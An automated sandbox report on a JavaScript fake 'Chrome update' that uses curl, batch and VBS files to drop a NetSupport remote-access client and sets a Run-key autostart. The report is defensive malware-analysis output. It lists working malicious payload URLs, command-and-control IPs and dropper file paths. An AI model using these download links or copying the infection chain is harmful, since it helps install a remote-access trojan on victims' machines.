                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1284200 Sample: Chrome_update.js Startdate: 02/08/2023 Architecture: WINDOWS Score: 96 88 Snort IDS alert for network traffic 2->88 90 Multi AV Scanner detection for domain / URL 2->90 92 Antivirus detection for URL or domain 2->92 94 2 other signatures 2->94 9 wscript.exe 15 2->9         started        13 client32.exe 2->13         started        15 client32.exe 2->15         started        process3 dnsIp4 84 mangoairsoft.com 188.127.230.147, 443, 49698, 49699 DHUBRU Russian Federation 9->84 86 192.168.2.1 unknown unknown 9->86 102 System process connects to network (likely due to code injection or exploit) 9->102 104 JScript performs obfuscated calls to suspicious functions 9->104 17 cmd.exe 7 9->17         started        signatures5 process6 file7 56 C:\Users\user\AppData\Local\Temp\b3.vbs, ASCII 17->56 dropped 58 C:\Users\user\AppData\Local\Temp\b2.vbs, ASCII 17->58 dropped 60 C:\Users\user\AppData\Local\Temp\b1.vbs, ASCII 17->60 dropped 96 Command shell drops VBS files 17->96 98 Uses cmd line tools excessively to alter registry or file data 17->98 21 cmd.exe 17->21         started        24 cmd.exe 1 17->24         started        26 cmd.exe 1 17->26         started        28 2 other processes 17->28 signatures8 process9 signatures10 100 Uses cmd line tools excessively to alter registry or file data 21->100 30 cmd.exe 1 21->30         started        32 cmd.exe 1 21->32         started        34 reg.exe 1 21->34         started        48 3 other processes 21->48 36 curl.exe 1 24->36         started        39 reg.exe 1 1 24->39         started        41 reg.exe 1 24->41         started        43 curl.exe 2 26->43         started        46 curl.exe 2 28->46         started        process11 dnsIp12 50 7zz.exe 26 30->50         started        53 client32.exe 18 32->53         started        72 mangoairsoft.com 36->72 74 mangoairsoft.com 43->74 70 C:\ProgramData\7zz.exe, PE32 43->70 dropped 76 mangoairsoft.com 46->76 file13 process14 dnsIp15 62 C:\ProgramData\remcmdstub.exe, PE32 50->62 dropped 64 C:\ProgramData\putty.exe, PE32+ 50->64 dropped 66 C:\ProgramData\pcicapi.dll, PE32 50->66 dropped 68 6 other files (1 malicious) 50->68 dropped 78 94.158.247.23, 49702, 5050 MIVOCLOUDMD Moldova Republic of 53->78 80 geography.netsupportsoftware.com 62.172.138.67, 49703, 80 BTGB United Kingdom 53->80 82 geo.netsupportsoftware.com 53->82 file16

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Chrome_update.js8%ReversingLabsScript-JS.Malware.Divergent

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\7zz.exe0%ReversingLabs
                                C:\ProgramData\HTCTL32.DLL3%ReversingLabs
                                C:\ProgramData\PCICHEK.DLL5%ReversingLabs
                                C:\ProgramData\PCICL32.DLL5%ReversingLabs
                                C:\ProgramData\TCCTL32.DLL3%ReversingLabs
                                C:\ProgramData\client32.exe12%ReversingLabs
                                C:\ProgramData\msvcr100.dll0%ReversingLabs
                                C:\ProgramData\pcicapi.dll3%ReversingLabs
                                C:\ProgramData\putty.exe0%ReversingLabs
                                C:\ProgramData\remcmdstub.exe3%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                SourceDetectionScannerLabelLink
                                mangoairsoft.com3%VirustotalBrowse

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                https://sectigo.com/CPS00%URL Reputationsafe
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                http://ocsp.sectigo.com00%URL Reputationsafe
                                http://www.pci.co.uk/supportsupport0%URL Reputationsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                                http://127.0.0.1RESUMEPRINTING0%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe100%Avira URL Cloudmalware
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0%URL Reputationsafe
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z100%Avira URL Cloudmalware
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe10%VirustotalBrowse
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat4%VirustotalBrowse
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?811970%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://mangoairsoft.com/0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                http://94.158.247.23/fakeurl.htm100%Avira URL Cloudmalware
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-0%Avira URL Cloudsafe
                                https://magydostravel.com/cdn/zwmrqqgqnaww.php100%Avira URL Cloudmalware
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?80%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf2500%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geography.netsupportsoftware.com
                                		62.172.138.67
                                		truefalse
                                  		high
                                  mangoairsoft.com
                                  		188.127.230.147
                                  		truetrueunknown
                                  geo.netsupportsoftware.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exetrue
                                    • 10%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      		high
                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.battrue
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7ztrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?81197true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://94.158.247.23/fakeurl.htmtrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.netsupportsoftware.com7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drfalse
                                        		high
                                        http://www.pci.co.uk/support7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://%s/testpage.htmwininet.dll7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://geo.netsupportsoftware.com/wclient32.exe, 00000012.00000003.427318962.000000000176A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.427449828.0000000001775000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.427594284.000000000177D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.425047789.0000000001773000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.425987309.000000000177D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://sectigo.com/CPS07zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl07zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                            		high
                                            http://ocsp.sectigo.com07zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.pci.co.uk/supportsupport7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ocsp.thawte.com07zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://127.0.0.1RESUMEPRINTING7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                            • URL Reputation: safe
                                            		low
                                            http://%s/testpage.htm7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://127.0.0.17zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-ocurl.exe, 00000008.00000002.396872502.0000016D98560000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.symauth.com/cps0(7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drfalse
                                              		high
                                              https://mangoairsoft.com/wscript.exe, 00000000.00000003.413975275.00000187DC99A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.416738367.00000187DC99A000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/07zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://%s/fakeurl.htm7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://geo.netsupportsoftware.com/location/loca.asp8_(client32.exe, 00000012.00000003.428077600.0000000006282000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428827308.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.423017250.0000000006262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.424012321.000000000625D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.426304165.0000000006263000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.424450797.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.423094602.000000000625D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.418804352.0000000006262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.427853705.0000000006282000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428424253.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.422749406.0000000006262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.424666384.0000000006263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-curl.exe, 00000006.00000002.395193868.000001925B637000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-curl.exe, 00000004.00000002.391796622.0000023B8DD50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://geo.netsupportsoftware.com/location/loca.aspeclient32.exe, 00000012.00000003.428827308.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428424253.0000000006259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.thawte.com/ThawteTimestampingCA.crl07zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drfalse
                                                    		high
                                                    https://www.chiark.greenend.org.uk/~sgtatham/putty/7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://magydostravel.com/cdn/zwmrqqgqnaww.phpCacheURL.dat.15.drfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.symauth.com/rpa007zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drfalse
                                                      		high
                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818eewscript.exe, 00000000.00000003.413730350.00000187DE6EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.385274963.00000187DE6E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.413975275.00000187DC98F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.416738367.00000187DC96C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.414042240.00000187DC96C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250wscript.exe, 00000000.00000003.413730350.00000187DE6EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.413870529.00000187DE6F4000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.netsupportschool.com/tutor-assistant.asp11(L7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                                        		high
                                                        https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?8wscript.exe, 00000000.00000002.418793988.00000187DCA28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.netsupportschool.com/tutor-assistant.asp7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          188.127.230.147
                                                          		mangoairsoft.comRussian Federation
                                                          		56694DHUBRUtrue
                                                          94.158.247.23
                                                          		unknownMoldova Republic of
                                                          		39798MIVOCLOUDMDtrue
                                                          62.172.138.67
                                                          		geography.netsupportsoftware.comUnited Kingdom
                                                          		5400BTGBfalse

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:38.0.0 Beryl
                                                          Analysis ID:1284200
                                                          Start date and time:2023-08-02 10:11:53 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 15m 1s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:26
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • GSI enabled (Javascript)
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:Chrome_update.js
                                                          Detection:MAL
                                                          Classification:mal96.troj.evad.winJS@40/37@5/4
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 88.6% (good quality ratio 85.2%)
                                                          • Quality average: 86.6%
                                                          • Quality standard deviation: 23.5%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 63
                                                          • Number of non-executed functions: 58
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .js
                                                          • Override analysis time to 240s for JS/VBS files not yet terminated

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          10:13:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CachedX C:\ProgramData\client32.exe
                                                          10:13:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CachedX C:\ProgramData\client32.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          62.172.138.678xW3tocJ6B.exeGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          RNdbR3uRmZ.exeGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          local-EN.htaGet hashmaliciousCobalt Strike, NetSupport RATBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          shdeulerinstall.lnkGet hashmaliciousNetSupport RATBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          bRGk8rpf6M.exeGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          tqWIHaQ2EZ.exeGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          sq36TjF9Sk.exeGet hashmaliciousNymaimBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          yOUWkF8AHi.exeGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          tUUPQygorhzFkIcHuB.batGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          Browser_update.jsGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          i7gVJvg3pD.jsGet hashmaliciousUnknownBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          file.exeGet hashmaliciousCryptOneBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          file.exeGet hashmaliciousCryptOneBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          uTwPUdjJJn.exeGet hashmaliciousCryptOneBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          QBupI0m2tr.exeGet hashmaliciousCryptOneBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          2023_vp.exeGet hashmaliciousCryptOneBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                          vp2023.exeGet hashmaliciousCryptOneBrowse
                                                          • geo.netsupportsoftware.com/location/loca.asp

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          geography.netsupportsoftware.com8xW3tocJ6B.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          5r5RuD1r4x.exeGet hashmaliciousUnknownBrowse
                                                          • 51.142.119.24
                                                          jqCED7njWa.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.8
                                                          EN-localer.htaGet hashmaliciousCobalt Strike, NetSupport RATBrowse
                                                          • 51.142.119.24
                                                          RNdbR3uRmZ.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          local-EN.htaGet hashmaliciousCobalt Strike, NetSupport RATBrowse
                                                          • 62.172.138.67
                                                          shdeulerinstall.lnkGet hashmaliciousNetSupport RATBrowse
                                                          • 62.172.138.67
                                                          BP6R1D2cOd.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.8
                                                          bRGk8rpf6M.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          tqWIHaQ2EZ.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          mitljPgJ0K.exeGet hashmaliciousUnknownBrowse
                                                          • 51.142.119.24
                                                          sq36TjF9Sk.exeGet hashmaliciousNymaimBrowse
                                                          • 62.172.138.67
                                                          yOUWkF8AHi.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          Ae8DId1ZVs.exeGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.8
                                                          tUUPQygorhzFkIcHuB.batGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.67
                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                          • 62.172.138.8
                                                          PurchaseOrder.exeGet hashmaliciousUnknownBrowse
                                                          • 51.142.119.24
                                                          a6PzqKcp6K.exeGet hashmaliciousUnknownBrowse
                                                          • 51.142.119.24
                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                          • 51.142.119.24

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          DHUBRUChrome_update.jsGet hashmaliciousUnknownBrowse
                                                          • 152.89.218.150
                                                          Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                          • 152.89.218.150
                                                          http://itsdigitalshiva.comGet hashmaliciousUnknownBrowse
                                                          • 185.9.147.166
                                                          https://altiordp.com/cdn-js/wds.min.phpGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.232
                                                          tUUPQygorhzFkIcHuB.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          2_1.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          2.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.231
                                                          KjMLNNlbSwRjEriciGnpqBNGGsSj.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.231
                                                          sett.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.231
                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          2.batGet hashmaliciousUnknownBrowse
